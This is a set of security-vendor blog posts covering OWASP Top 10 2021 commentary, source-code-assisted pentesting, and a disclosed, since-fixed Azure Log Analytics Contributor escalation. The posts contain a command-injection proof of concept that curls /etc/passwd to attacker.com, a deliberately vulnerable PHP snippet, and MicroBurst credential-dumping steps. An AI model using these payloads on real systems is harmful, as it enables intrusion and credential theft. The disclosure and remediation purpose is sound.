
AppSec Experts React to the OWASP Top 10 2021

The Open Web Application Security Project (OWASP) celebrated its 20th anniversary on Friday, September 24. On the same day, it released updates to the OWASP Top 10 – for the first time since 2017.

Big steps toward application security maturity

I attended OWASP Executive Director Andrew van der Stock’s warmup presentation where he spoke about the updates. He mentioned that many of the changes stem from improvements in the methodology brought in by Brian Glas, a new co-lead of the OWASP Top 10 project. Notably, this version of the OWASP Top 10 is “more data-driven than ever.”

It sourced its data from pentesting vendors, bug bounty vendors, and organizations that contribute internal testing data. This year, the authors gathered data from the testing of over 500,000 applications. There are also two risks on the list that were sourced from a community survey of front-line application security and development experts. You can read more about the OWASP Top 10 methodology here. Below is an overview of the changes, 2017 versus 2021.

Overview of the OWASP Top 10 changes, 2017 versus 2021.

Speaking of front-line application security and development experts, I wanted to dig a little deeper into the OWASP Top 10 2021 and hear from folks who are influenced by the update. So, I reached out to a few of my NetSPI colleagues who specialize in application security and application penetration testing – Managing Director Nabil Hannan and Practice Director Antti Rantasaari – as well as a bench of noteworthy AppSec experts – Diana Kelley (Security Curve), Jeff Williams (Contrast Security), and Peter Lukas (Code42) – to get their take on the most critical changes and how they will impact the security community.

TL;DR – 5 key themes observed across the responses 

  1. A04: Insecure Design receives a warm welcome. 
  2. Broken Access Control moving to the top of the list is timely, and an indicator of a shift in AppSec strategy.
  3. Cloud adoption is driving the prevalence of Server-Side Request Forgery (SSRF).
  4. A strong focus on security within the SDLC; Approaching security challenges at the root.
  5. The list moves past specific individual vulnerabilities and focuses on categories of risk. 

What surprises or interests you most about the OWASP Top 10 2021? 

I’ll start! For me, the fall of Injection was the most surprising change. Injection had been the highest-ranked risk since 2010. The 2021 version of the Top 10 sees Injection fall to third place, even with XSS (which was A02 in 2010) getting rolled into it. While several factors contributed to this change, the most prominent are the efficacy of the OWASP Top 10 as an awareness-raising tool and the growing use of secure-by-default frameworks that implement protections against many forms of injection.
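To make the “secure by default” point concrete, here is a minimal illustration of the difference between concatenating user input into a query and using a parameterized query (PHP’s PDO is used purely as an example; modern frameworks and ORMs apply the same pattern by default):

// Vulnerable: user input concatenated directly into the SQL string
$rows = $db->query("SELECT * FROM users WHERE name = '" . $_GET['name'] . "'");

// Safer: a parameterized query, the default pattern in most modern frameworks and ORMs
$stmt = $db->prepare("SELECT * FROM users WHERE name = :name");
$stmt->execute([':name' => $_GET['name']]);
$rows = $stmt->fetchAll();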

Here’s what our expert panel found most shocking or interesting about the updated Top 10: 

Peter Lukas, Security Architect, Code42:  

“The updates to the OWASP Top 10 are out, and there are some noteworthy conclusions that can be drawn from them. Most interestingly, Broken Authentication has fallen from position A02 to position A07, while Broken Access Control has surged to the very top of the list! This tells me that we’re getting better at locking the front door, and we really need to shift our focus to where users are entitled to go once inside our application environment.”

Antti Rantasaari, Practice Director, NetSPI:

“The OWASP Top 10 2021 moves a bit further from vulnerabilities and more towards design and the SDLC. The Top 10 list has been more vulnerability-focused in the past, and now we are seeing very broad categories, like Insecure Design. Broken Access Control moving to A01 makes a lot of sense – that is the most common high-severity vulnerability that we identify during our penetration testing.”

Diana Kelley, CTO and Founding Partner, Security Curve:  

“Not exactly surprised, but it was really interesting and timely to see Broken Access Control move to the top of the list. I am a little disappointed to see Cryptographic Failures up at number two because we have a lot of great tools – many that are built into the most commonly used development frameworks – to help us implement crypto and crypto key management securely.” 

Nabil Hannan, Managing Director, NetSPI:  

“The most surprising change – in a good way – is the fact that the list now includes Insecure Design. Having worked in the AppSec space for the last 15 years, from empirical data I’ve seen that the split between design flaws and security bugs is 50/50. The challenge with design flaws is that they usually require a human to identify, typically through some type of secure design review or threat modeling activity that focuses on breaking the software. This addition indicates that organizations are going beyond just identifying security bugs and are starting to look for design-level flaws more proactively.

Additionally, it is important to note that organizations need to maintain a living list of the most common types of vulnerabilities they want to eliminate in their software. This typically needs to be a short list – the top 3-4 vulnerabilities – to ensure proper focus, and it can be built from real data from the various types of security assessments being performed to identify and fix vulnerabilities. These lists should be used to drive change: simply publishing a list won’t drive change, but using it to fix – or, if possible, eradicate – certain vulnerabilities will.”

Jeff Williams, Co-Founder and CTO, Contrast Security:  

“I was most glad to see that the scope of the Top 10 has expanded to include the entire software supply chain and the entire software lifecycle. In particular, I welcome the new Insecure Design item, which will encourage practices like threat modeling and security architecture. I also think it’s great that, in the wake of the SolarWinds and Kaseya breaches, the team included the Software Integrity category. This will help to ensure that the software we create is actually the software that gets delivered into production and doesn’t contain malware.

The data science behind the OWASP Top 10 is phenomenal – data from over 500 thousand real-world applications and APIs. I really wish they had included data about real-world attacks, as this would have greatly expanded our understanding of which of these vulnerabilities are being attacked, how prevalent the attacks are, and which attacks actually reach their targeted vulnerability.”

There are three new vulnerabilities on the list: Server-Side Request Forgery (SSRF), Software and Data Integrity Failures, and Insecure Design. Why do you think these vulnerabilities have become more prevalent? 

It is important to note that these three new categories are the result of an important change in the data gathering methodology. In previous versions of the OWASP Top 10, data contributors were asked to report statistics on defect discovery findings that mapped to 70 specific CWEs (weakness categories, as defined by MITRE’s Common Weakness Enumeration project). Data for any findings that did not map to those CWEs was not previously gathered. This resulted in a huge selection bias. How huge? For the first time, the 2021 Top 10 instead asked data contributors to submit statistics for all CWEs, resulting in responses with findings data for almost 700 CWEs! Considering this nearly tenfold increase in CWEs evaluated, it’s not surprising to see the emergence of these three new categories: SSRF, Software and Data Integrity Failures, and Insecure Design.

More thoughts on the three new categories from our AppSec experts:  

Diana Kelley, CTO and Founding Partner, Security Curve:  

“I am absolutely thrilled that Insecure Design was added as a new category. Past Top 10s have focused on the technical implementation, which occurs after the design phase. However, many mistakes are introduced through problematic design and, as its inclusion in this list suggests, this happens a lot. The earlier a problem can be identified and addressed, the better. Better, more security-aware design processes should result in stronger, more resilient software.

I’m also very happy to see Software and Data Integrity because, as described by OWASP, this is getting into the area of software supply chain assurance. As we saw with SolarWinds, even patches and updates can be an infection vector. Highlighting the importance of checking code updates before applying them is welcome and should contribute to overall software security at organizations.  

SSRF is an interesting addition. This has always been an issue to watch for, but one of the reasons it might be becoming more prevalent now is the ubiquity of application designs built around REST – service-based architecture and microservices, particularly those delivered via the cloud. The more prevalent REST becomes as a mode of application design and delivery, the more we would expect misconfigured services to add to this problem. The fact that we’re seeing it on the list reflects the reality of how modern applications are built, so I’m glad to see it there.”

Peter Lukas, Security Architect, Code42:  

“The inclusion of Insecure Design (A04:2021), Software and Data Integrity Failures (A08:2021), and Server-Side Request Forgery (A10:2021) reflects trends we’ve been observing in our own penetration testing and bug bounty programs. The prevalence of containerized services, reverse proxies, and other cloned-from-the-repo microservices is making it easy for our developers to get code out the door while giving attackers the opportunity to inconspicuously take advantage of the trust we’ve placed in common automation and orchestration components. Today, our developers are not only tasked with securing the application but, thanks to those components, the application environment as well. I can see this added responsibility reflected in these updates for 2021.”

Antti Rantasaari, Practice Director, NetSPI:

“As OWASP states, the Top 10 list is intended to bring awareness to application security risks, and two of the new categories, Software and Data Integrity Failures and Insecure Design, are certainly important for secure software development. These issues may not be more prevalent than before; rather, their addition reflects OWASP’s move away from the top 10 vulnerabilities to the top 10 application security categories.

SSRF is the only individually listed vulnerability, while the other items on the Top 10 list are broad categories. Access to REST APIs and cloud provider metadata services via SSRF, most commonly restricted to GET requests, has increased the impact and raised the profile of the attack.”

Jeff Williams, Co-Founder and CTO, Contrast Security:  

“SSRF is a great addition. Even though the backward-looking data science doesn’t support it, I think it’s smart to include a few forward-looking items in the list. This is a practice I started when I ran the OWASP Top 10 project many years ago. SSRF in particular is a serious problem for modern API-driven applications and is clearly where the puck is going. Both Software Integrity and Insecure Design are interesting items that dramatically expand the scope of the OWASP Top 10. I think it’s great that the team is moving past specific individual vulnerabilities and focusing on whole categories of problems, as well as expanding to cover parts of the software development lifecycle that are the root cause of problems.”

Nabil Hannan, Managing Director, NetSPI:  

“The three new vulnerabilities in the list are indicative of how the industry is shifting its focus on security from being a check-the-box activity to proactively identifying and fixing vulnerabilities. Regarding SSRF: with more and more organizations migrating to the cloud and adopting an API-based design paradigm, SSRF is becoming more prevalent. Regarding Data Integrity Failures and Insecure Design: there is more focus these days on making sure software systems are designed properly and that those designs are secure – which is a step in the right direction to proactively building secure software.”

Final Thoughts on the OWASP Top 10 2021 

The 2017 OWASP Top 10 had data from 50,000 assessments of web applications. This year’s version has ten times that amount. In addition, this year the data-gathering process required contributors to differentiate between initial test data and retest data. Previous versions of the Top 10 treated initial-test and retest data identically, which is problematic for defect discovery methods that let developers quickly and inexpensively rescan their code – it can inflate the counts of defects that are easily discovered through certain automated methods. I’m glad to see this problem addressed in this year’s methodology.

Injection findings moving down on the list is a testament to the effectiveness of the OWASP Top 10. Collaborating to create awareness for the most common web application security risks is critical. Along those same lines, for years people have been incorporating the OWASP Top 10 into their standards, for instance, PCI. OWASP had been averse to this, considering it is a volunteer organization. However, they’ve had a change of heart and the 2021 release includes guidance on how to use it as a standard and how to begin to develop an application security program with it.  

However you choose to leverage the OWASP Top 10, it’s evident that – cue Bob Dylan – the times they are a-changin’. I applaud the OWASP authors and contributors for making the necessary updates to the list and its methodology. It’s a significant step towards improving the maturity of the world’s application security programs and practices.

NetSPI’s web application pentesting services target the OWASP Top 10. Connect with our AppSec experts to get started!

Why You Should Consider a Source Code Assisted Penetration Test

In almost every industry, client-provider relationships look for win-win scenarios. For some, a win-win is as simple as a provider getting paid and the client getting value out of the money they paid for the service or product. While delivering high-quality services is certainly a big win, there are many opportunities in the pentesting space to win even bigger from the perspective of both the client and the provider. Enter: source code assisted penetration testing.

Here’s the TL;DR of this article in a quick bullet list:

5 reasons why you should consider a source code assisted pentest:

  • More thorough results
  • More comprehensive testing
  • More vulnerabilities discovered
  • No added cost 
  • Much more specific remediation guidance for identified vulnerabilities 

Not convinced? Let’s take a deeper dive into why you should choose a source code assisted pentest over a black-box or grey-box pentest.

Cost

We should probably get this out of the way first. To make a long story short, there’s no extra cost to do source code assisted penetration testing with NetSPI. This is a huge win, but it is by no means the only benefit of a source code assisted pentest. We’ll discuss the benefits in greater detail below.

Black-box vs. grey-box vs. white-box penetration testing 

Penetration testing is typically performed from a grey-box or black-box perspective. Let’s define some of these terms:

Black-box: This means that the assessment is performed from the perspective of a typical attacker on the internet. No special access, documentation, source code, or inside knowledge is provided to the pentester in this type of engagement. This type of assessment emulates a real-world attacker scenario.

Grey-box: This means that the assessment is performed with limited knowledge of the inner workings of the application (usually given to the tester through a demo of the application). Access is typically granted to the testers by providing non-public access to the application in the form of user or admin accounts for use in the testing process. Grey-box is the typical perspective of most traditional pentests.

White-box: This is where source code assisted pentests live. This type of assessment includes everything that a grey-box one would have but adds onto it by providing access to the application’s source code. This type of engagement is far more collaborative. The pentester often works with the application architects and developers to gain a better understanding of the application’s inner workings.

Many come into a pentest with the desire to have a black-box pentest performed on their application. This seems very reasonable when you put yourself in their shoes, because what they’re concerned about is ultimately the real-world attacker scenario. They don’t expect an attacker to have access to administrative accounts, or even customer accounts. They also don’t expect an attacker to have access to their internal application documentation, and certainly not to the source code. These are all very reasonable assumptions, but let’s discuss why these assumptions are misleading.

Never assume your user or admin accounts are inaccessible to an attacker

If you want an in-depth discussion on how attackers gain authenticated access to an application, go read this article on our technical blog, Login Portal Security 101. In summary, an attacker will almost always be able to get authenticated access into your application as a normal user. At the very least, they can usually go the legitimate route of becoming a customer to get an account created, but typically this isn’t even necessary.

Once the authentication boundary has been passed, authorization bypasses and privilege escalation vulnerabilities are exceedingly common findings even in the most modern of applications. Here’s one (of many) example on how an attacker can go from normal user to site admin: Insecurity Through Obscurity.

Never assume that your source code is inaccessible to an attacker

We’ve encouraged clients to choose source code assisted pentesting for some time now, but there are many reasons why organizations are hesitant to give out access to their source code. Most of these concerns are for the safety and privacy of their codebase, which contains highly valuable intellectual property. These are valid concerns, and it’s understandable to wait until you’ve established a relationship of trust before handing over your crown jewels. In fact, I recommend this approach if you’re dealing with a company whose reputation and integrity you cannot verify. However, let me demonstrate why source code assisted pentests are so valuable by telling you about one of our recent pentests: 

Customer A did not provide source code for an assessment we performed. During the engagement, we identified a page that allowed file uploads. We spent some time testing how well they had protected against uploading potentially harmful files, such as .aspx, .php, .html, etc. This endpoint appeared to have a decent whitelist of allowed files and wouldn’t accept any malicious file uploads that we attempted. The endpoint did allow us to specify certain directories where files could be stored (instead of the default locations) but was preventing uploads to many other locations. Without access to the source code handling these file uploads, we spent several hours working through different tests to see what we could upload, and to where. We were suspicious that there was a more significant vulnerability within this endpoint, but eventually moved on to testing other aspects of the application given the time constraints of a pentest.

A few days later, we discovered another vulnerability that allowed us to download arbitrary files from the server. Due to another directory traversal issue, we were finally able to exfiltrate the source code that handled the file upload we had been testing previously. With access to the source, we quickly saw that they had an exception to their restricted files list when uploading files to a particular directory. Using this “inside knowledge” we were able to upload a webshell to the server and gain full access to the web server. This webshell access allowed us to… you guessed it… view all their source code stored on the web server. We immediately reported the issue to the client and asked whether we could access the rest of the source code stored on the server. The client agreed, and we discovered several more vulnerabilities within the source that could have been missed if we had continued in our initial grey-box approach.

Attackers are not bound by time limits, but pentesters are

The nature of pentesting requires that we only spend a predetermined amount of time pentesting a particular application. The story above illustrates how much valuable time is lost when pentesters have to guess what is happening on the server-side. Prior to having the source code, we spent several hours going through trial and error in an attempt to exploit a likely vulnerability. Even after all that time, we didn’t discover any particularly risky exploit and could have passed this over as something that ultimately wasn’t vulnerable. However, with a 5-minute look at the code, we immediately understood what the vulnerability was, and how to exploit it. 

The time savings alone is a huge win for both parties. Saving several hours of guesswork during an assessment that lasts only 40 hours is extremely significant. You might be saying, “but if you couldn’t find it, that means it’s unlikely someone else would find it… right?” True, but “unlikely” does not mean “impossible.” Would you rather leave a vulnerability in an application when it could be removed? 

Let’s illustrate this point with an example of a successful source code assisted penetration test: During a source code assisted pentest, we discovered an endpoint that did not show up in our scans, spiders, or browsing of the application. By looking through the source code, we discovered that the endpoint could still be accessed if explicitly browsed to and determined the structure of the request accepted by this “hidden” endpoint.


The controller took a “start_date” and “end_date” from the URL and then passed those variables into another function that used them in a very unsafe manner:

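The original code screenshots aren’t reproduced here, but a minimal sketch of the pattern – reusing the file and variable names from the remediation guidance below, with everything else hypothetical – looks something like this:

<?php
// examplecontroller.php – hypothetical reconstruction, not the client's actual code
// The dates are read straight from the query string with no validation
$startDate = $_GET['start_date'];
$endDate   = $_GET['end_date'];

// The unfiltered parameters are concatenated into a shell command string...
$scriptOgcJs = "/usr/local/bin/report_gen.sh " . $startDate . " " . $endDate;

// ...and executed at the system level, so a pipe or semicolon in either
// parameter becomes command injection
$output = shell_exec($scriptOgcJs);
echo $output;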

This PHP file used the unfiltered, unmodified, un-sanitized parameters directly in a string that was passed to a “shell_exec()” function call. That function executes its argument at the system level, which resulted in command injection on the server. As a proof of concept, we made the following request to the server and were able to exfiltrate the contents of /etc/passwd to an external server: https://redacted.com/redacted/vulnpath?start_date=2017-07-16|echo%20%22cmd=cat%20/etc/passwd%22%20|%20curl%20-d%20@-%20https%3a%2f%2fattacker.com%2flog%20%26

In layman’s terms: An attacker is essentially able to run any code they want on the server with this vulnerability, which could lead to full host or even network compromise. 

With a vulnerability this significant, you should be wondering why this endpoint never showed up in any of our black-box or grey-box pentesting. Well, the answer is that this particular endpoint was supposed to be used by only a subset of the client’s customers. The testing accounts we were given did not include the flag to show this endpoint. Had this been a pentest without access to source code, this would almost certainly have been missed, and the command injection vulnerability would still be sitting in the open for the customer accounts that could see this endpoint. After fixing this vulnerability, the client confirmed that no one had already exploited it and breathed a huge sigh of relief.

On the other hand, the client in our first example had a far different outcome. Even though the company immediately fixed the vulnerability in the latest version of the product, they failed to patch previously deployed instances and those instances were hacked months later. A key portion of the hacker’s exploit chain was the file upload vulnerability we had identified using the source code. 

Had we not discovered the vulnerability and disclosed it to them, the hack would have been much worse. Perhaps the attackers used the same methodology we did to exploit the vulnerability, but it’s just as likely that they used another method of discovering a working exploit against that file upload. This is a perfect example of why source code assisted pentests should be your go-to solution when performing a pentest. We discovered the vulnerability months ahead of them getting hacked because we had access to the source code. If they had properly mitigated the vulnerability, they could have potentially avoided an exceptionally costly hack.

Specific Remediation Guidance

To close out this post, I want to highlight how much more specific the remediation guidance can be when we’re performing a source code assisted pentest as opposed to one without source code. Here’s an example of the remediation guidance given to a client for the vulnerable PHP script:

Employ escapeshellarg() to prevent additional shell arguments from being injected into the argument string. Specifically, change line 47 to this:

$output = shell_exec(escapeshellarg($scriptOgcJs));

Additionally, the startDate and endDate parameters should be validated as real dates on line 26 of the examplecontroller.php page. It is recommended that you implement the PHP checkdate() function as a whitelist measure to prevent anything other than a well-formatted date from being used in sensitive functions. Reference: https://www.php.net/manual/en/function.checkdate.php
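For illustration only, that date validation might look something like the following sketch (the surrounding code and exact parameter handling are assumptions, not the client’s code):

// Whitelist the date before it is ever used in a sensitive function (hypothetical sketch)
list($y, $m, $d) = array_map('intval', explode('-', $_GET['start_date']));
if (!checkdate($m, $d, $y)) {
    http_response_code(400);
    exit('Invalid start_date');
}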

Without access to the source code, we are only able to give generic guidance for remediation steps. With the source code, we can recommend specific fixes that should help your developers more successfully remediate the identified vulnerabilities.

Get Started on a Source Code Assisted Pentest with NetSPI

CSO: 8 top cloud security certifications

NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications:

As companies move more and more of their infrastructure to the cloud, they’re forced to shift their approach to security. The security controls you need to put in place for a cloud-based infrastructure are different from those for a traditional datacenter. There are also threats specific to a cloud environment. A mistake could put your data at risk.

It’s no surprise that hiring managers are looking for candidates who can demonstrate their cloud security know-how—and a number of companies and organizations have come up with certifications to help candidates set themselves apart. As in many other areas of IT, these certs can help give your career a boost.

But which certification should you pursue? We spoke to a number of IT security pros to get their take on those that are the most widely accepted signals of high-quality candidates. These include cloud security certifications for both relative beginners and advanced practitioners.

Going beyond certifications

All of these certs are good ways to demonstrate your skills to your current or potential future employers — they’re “a good way to get your foot in the door at a company doing cloud security and they’re good for getting past a resume filter,” says Karl Fosaaen, Cloud Practice Director at NetSPI. That said, they certainly aren’t a be-all, end-all, and a resume with nothing but certifications on it will not impress anybody.

“Candidates need to be able to show an understanding of how the cloud components work and integrate with each other for a given platform,” Fosaaen continues. “Many of the currently available certifications only require people to memorize terminology, so you don’t have a guaranteed solid candidate if they simply have a certification. For those hiring on these certifications, make sure that you’re going the extra level to make sure the candidates really do understand the cloud providers that your organization uses.”

Fosaaen recommends pursuing specific trainings to further burnish your resume, such as the SANS Institute’s Cloud Penetration Testing course, BHIS’s Breaching The Cloud Perimeter, or his own company’s Dark Side Ops Training. Concrete training courses like these can be a great complement to the “book learning” of a certification.

To learn more, read the full article here: https://www.csoonline.com/article/3631530/8-top-cloud-security-certifications.html


Escalating Azure Privileges with the Log Analytics Contributor Role

TL;DR – This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.

The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.

Based on the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the Subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.

Escalating Azure Permissions

Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.
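As a rough sketch of that step (resource and runbook names below are hypothetical, and this reflects the role’s pre-fix Automation Account rights), the Az PowerShell module could be used as follows:

# Assumes an Az session as the Log Analytics Contributor user; all names are placeholders
$rg = "target-rg"
$aa = "target-automation-account"

# Import and publish a runbook containing attacker-controlled PowerShell
Import-AzAutomationRunbook -ResourceGroupName $rg -AutomationAccountName $aa `
    -Name "maintenance-task" -Type PowerShell -Path .\payload.ps1 -Published

# Start it; the job executes under the Automation Account's Run As identity,
# which holds Contributor on the subscription
Start-AzAutomationRunbook -ResourceGroupName $rg -AutomationAccountName $aa -Name "maintenance-task"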

These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.

Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).
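Once the exported certificate has been imported into the local certificate store (as the MicroBurst helper script shown later does), a persistent login as the Run As service principal looks roughly like this (placeholder values):

# Placeholder values; the application ID belongs to the Run As service principal
Connect-AzAccount -ServicePrincipal `
    -ApplicationId "<runas-app-id>" `
    -TenantId "<tenant-id>" `
    -CertificateThumbprint "<certificate-thumbprint>"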

Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.

Attack Walkthrough

Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. We needed to be an Owner on the subscription to create this account, as Contributors do not have rights to add the Run As account.

Add Automation Account

Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.

Access Control

In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.

Role added

On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.

PS C:\temp> Connect-AzAccount
 
Account SubscriptionName TenantId Environment
------- ---------------- -------- -----------
LogAnalyticsContributor kfosaaen 6[REDACTED]2 AzureCloud

Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.

PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Using the Get-AzPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate for the Automation Account.

PS C:\temp> Get-AzPasswords -Verbose 
VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED]
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account
VERBOSE: Password Dumping Activities Have Completed

We then used the MicroBurst created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID – d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.

PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1
PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint Subject
---------- -------
A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5
Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud],
[AzureUSGovernment, AzureUSGovernment]}
Context : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp> Get-AzContext | select Account,Tenant
Account Subscription
------- ------
d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5
PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
RoleAssignmentId : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352
Scope : /subscriptions/7a[REDACTED]b5
DisplayName : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=
SignInName :
RoleDefinitionName : Contributor
RoleDefinitionId : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
ObjectType : ServicePrincipal
CanDelegate : False
Description :
ConditionVersion :
Condition :
LAC Contributor

MSRC Submission Timeline

Microsoft was great to work with on the submission and they were quick to respond to the issue. They have since removed the Automation Accounts permissions from the affected role and updated documentation to reflect the issue.

Custom Azure Automation Contributor Role

Here’s a general timeline of the MSRC reporting process:

  • NetSPI initially reports the issue to Microsoft – 10/15/20
  • MSRC Case 61630 created – 10/19/20
  • Follow up email sent to MSRC – 12/10/20
  • MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
  • Multiple back and forth emails to determine disclosure timelines – March-July 2021
  • Microsoft updates the role documentation to address the issue – July 2021
  • NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
  • Microsoft removes Automation Account permissions from the LAC Role – August 2021

Postscript

While this blog doesn’t cover every way to escalate from the Log Analytics Contributor role, there are many other ways to pivot from it. Here are some of its other permissions:

                "actions": [
                    "*/read",
                    "Microsoft.ClassicCompute/virtualMachines/extensions/*",
                    "Microsoft.ClassicStorage/storageAccounts/listKeys/action",
                    "Microsoft.Compute/virtualMachines/extensions/*",
                    "Microsoft.HybridCompute/machines/extensions/write",
                    "Microsoft.Insights/alertRules/*",
                    "Microsoft.Insights/diagnosticSettings/*",
                    "Microsoft.OperationalInsights/*",
                    "Microsoft.OperationsManagement/*",
                    "Microsoft.Resources/deployments/*",
                    "Microsoft.Resources/subscriptions/resourcegroups/deployments/*",
                    "Microsoft.Storage/storageAccounts/listKeys/action",
                    "Microsoft.Support/*"
                ]

More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.
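As a rough illustration of both pivots (all resource names and URIs below are placeholders):

# Run an arbitrary script on a VM via the Custom Script Extension
Set-AzVMCustomScriptExtension -ResourceGroupName "target-rg" -VMName "target-vm" `
    -Location "eastus" -Name "CustomScriptExtension" `
    -FileUri "https://attacker-controlled.example/payload.ps1" -Run "payload.ps1"

# List the access keys for a Storage Account the role can enumerate
Get-AzStorageAccountKey -ResourceGroupName "target-rg" -Name "targetstorageaccount"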

Looking for an Azure pentesting partner? Consider NetSPI.


A Checklist for Application Security Program Maturity

Building an application security (AppSec) program that stays current is no easy feat. Add to that the ubiquity of software and applications in everything from consumer goods to medical devices to submarines. There is an increasingly urgent need for organizations to take another look at their AppSec strategies to ensure they are not left vulnerable to cyberattacks, and to continuously measure and improve their program maturity.

Heads up: Building a world-class, mature AppSec security program is something that needs to be accomplished in phases. It will not happen overnight. A great deal of foundational work needs to be in place before an organization can achieve positive results. 

When analyzing AppSec programs, we often find a number of sizable gaps in how vulnerabilities are managed as well as opportunities for improvement, especially related to security processes around the software development lifecycle (SDLC). Addressing these issues and harmonizing the various security processes will help give organizations the capability and vision to identify, track, and remediate vulnerabilities more efficiently, eventually elevating the organization to the level of maturity it seeks.

Following is a checklist to help organizations think through the issues around AppSec maturity to build a program that produces valuable security results.

  Ensure Your Security Practices are Current

Given how rapidly application development techniques and methodologies are transforming – and the rate at which software is developed today – companies need to ensure that their security practices are staying current with the ever-changing pressures around compliance/governance, software deployment, DevOps, SDLC, and training. Understanding the current level of maturity and developing a data-driven plan to evolve your AppSec program is key to the success of an organization’s security efforts.

  Leverage Real World Data to Benchmark Your AppSec Program

Put a stake in the ground and objectively determine the status of your AppSec program. Comparing your organization’s program with real world data across multiple business verticals will help augment your efforts and determine areas that require focus. Base your security decisions on your specific business needs and lessons learned from other mature programs in your industry.

  Put Roadmaps in Place to Prioritize and Allocate Resources

The AppSec and software engineering teams within an organization should constantly partner to evolve and improve the AppSec posture for all software assets. This collaboration will help determine how to improve upon current efforts while uncovering additional activities that should be adopted to meet business goals. Putting in place a formalized roadmap for this collaboration allows an organization to better prioritize its business initiatives, budgets, and resource allocation while reducing the overall AppSec risk faced by the organization.

Roadmap stipulation: Use caution and watch for bias. Organizations that are serious about developing a mature program need to be mindful that there may be inherent team biases based on familiarity. For example, if the AppSec team comes from a penetration testing background, the program may lean toward a pentesting bias. Is the team’s experience in code review? Then that bias may shine through. While both disciplines are important and should be a part of an AppSec program, my point is that there may be bias when a more objective approach is needed. 

Also understand that there are many frameworks to mature application security. A one-size-fits-all approach is not going to work because every organization has unique needs and objectives around thresholds, risk appetite, and budget availability. 

  Insist on Governance in the SDLC

Setting up governance within the SDLC is critical. Why? If security teams don’t define what they are trying to accomplish or what security looks like within the SDLC process, it leaves too much ambiguity about who is accountable. Creating governance around the SDLC will also help define where an organization needs to build in testing, both manual and automated, from a vulnerability discovery perspective.

  Track Your Progress; Benchmark Your Efforts Against Your Peers

Benchmarking your AppSec program by leveraging industry standard frameworks allows you to measure AppSec program maturity consistently and objectively, and make informed decisions based on your business objectives.

Benchmarking scorecards, supported with visuals, enable high-bandwidth conversations with your organization’s leadership team and provide an opportunity to showcase the positive influence that your AppSec program is having on the organization’s business goals. Additionally, you can leverage data from your benchmarking efforts to compare your efforts to others within your peer vertical group, as well as other business verticals that are leveraging the same industry standard AppSec framework.

  Employ Risk-Based Application Penetration Testing

When looking to mature an AppSec program, organizations should view application penetration testing as a gate validating that everything implemented in the SDLC is working, not just a discovery of vulnerabilities. Pentesting services should be the method used to determine the effectiveness of your secure SDLC and all the automated and manual processes implemented. Oftentimes, organizations will approach this concept in reverse by starting with penetration testing.

